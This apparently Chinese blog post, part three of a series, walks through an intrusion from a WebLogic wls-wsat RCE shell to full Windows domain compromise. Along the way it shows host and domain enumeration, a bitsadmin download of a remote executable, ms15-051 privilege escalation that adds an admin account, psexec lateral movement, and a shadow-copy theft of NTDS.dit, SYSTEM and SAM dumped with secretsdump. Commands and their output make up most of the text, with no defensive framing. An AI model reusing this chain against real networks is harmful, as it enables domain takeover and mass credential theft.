Weblogic引发的血案-3

直接用WebLogic_Wls-Wsat_RCE_Exp.jar exp获取到shell，和上上篇文章一样。

hostname -->BX1

systeminfo -->Windows Server 2012 R2 Standard 169补丁

ipconfig -->192.168.2.23 

whoami & net localgroup administrators -->得知当前用户属于管理员组，同时不确定管理员组里帐号（kx\kxadmin）是不是域管

tasklist -->WRSA.exe Webroot杀软(一开始没注意到这线程，以为没杀软，绕了点弯路)

所属域 -->Kx

bitsadmin /transfer n http://xxx.xxx.xxx/xxx.exe C:\xxx\xxx.exe

net group 查看组名

net group "domain admins" /domain 查看域管理员

nltest /dclist:kx 查看域控

C:\Oracle\Middleware\user_projects\domains\bifoundation_domain>net group "Domain Admins" /domain

net group "Domain Admins" /domain

The request will be processed at a domain controller for domain Kx.

Members

-------------------------------------------------------------------------------

xxxx                  Administrator            xxxx

kxadmin                  xxxx                xxxx



C:\Oracle\Middleware\user_projects\domains\bifoundation_domain>nltest /dclist:Kx

nltest /dclist:Kx

Get list of DCs in domain 'Kx' from '\\AD1.Kx'.

    AD1.Kx [PDC]  [DS] Site: Default-First-Site-Name

    AD2.Kx        [DS] Site: Default-First-Site-Name

    AD3.Kx        [DS] Site: Default-First-Site-Name



说明：xxxx代表的是马赛克

利用ping命令得到域控IP

AD1.Kx -->192.168.2.225 域控

AD2.Kx -->192.168.2.215 域控

AD3.Kx -->192.168.2.245 域控

C:\Oracle\Middleware\user_projects\domains\bifoundation_domain>net localgroup administrators

Members

-------------------------------------------------------------------------------

Administrator

Kx\xxxx

Kx\xxxx

Kx\kxadmin（可能是域管账号）

说明：这里不能说Administrator用户为域管，因为本机默认有个adminstrator,域控默认也有1个，但这两个并不是同一个。

python windows-exploit-suggester.py --database 2018-04-10-mssb.xls --systeminfo 1.txt

C:\Oracle\Middleware\user_projects\domains\bifoundation_domain>ms15-051.exe "net user admin1 Qqaazz7

41/add"

ms15-051.exe "net user admin1 Qqaazz741/add"



C:\Oracle\Middleware\user_projects\domains\bifoundation_domain>dir



 Directory of C:\Oracle\Middleware\user_projects\domains\bifoundation_domain



04/12/2018  06:43 AM    <DIR>          .

04/12/2018  06:43 AM    <DIR>          ..

11/10/2017  09:34 AM               144 edit.lok

07/23/2016  08:17 PM               506 fileRealm.properties

07/23/2016  08:17 PM    <DIR>          init-info



emmmmm运行完之后，提权工具没了？！

use exploit/windows/smb/psexec

C:\Windows\System32>vssadmin create shadow /for=c:

vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool

(C) Copyright 2001-2013 Microsoft Corp.



Successfully created shadow copy for 'c:\'

    Shadow Copy ID: {b1a1be28-c02a-4402-bf80-f82b46673b03}

    Shadow Copy Volume Name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy4



C:\Windows\System32>vssadmin list shadows

vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool

(C) Copyright 2001-2013 Microsoft Corp.



Contents of shadow copy set ID: {56512710-bc51-4ba7-98cc-4d1c5d7b75ae}

   Contained 1 shadow copies at creation time: 4/12/2018 2:07:02 AM

      Shadow Copy ID: {b1a1be28-c02a-4402-bf80-f82b46673b03}

         Original Volume: (C:)\\?\Volume{aececd34-32d8-4d4f-9dc6-184ea98a825f}\

         Shadow Copy Volume: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy4

         Originating Machine: AD3.Kx

         Service Machine: AD3.Kx

         Provider: 'Microsoft Software Shadow Copy provider 1.0'

         Type: ClientAccessible

         Attributes: Persistent, Client-accessible, No auto release, No writers, Differential





C:\Windows\System32>copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy4\windows\NTDS\NTDS.dit c:\

        1 file(s) copied.



C:\Windows\System32>copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy4\windows\system32\config\system c:\

        1 file(s) copied.



C:\Windows\System32>copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy4\windows\system32\config\sam c:\

        1 file(s) copied.

python secretsdump.py -ntds /root/ntds_cracking/ntds.dit -system /root/ntds_cracking/SYSTEM LOCAL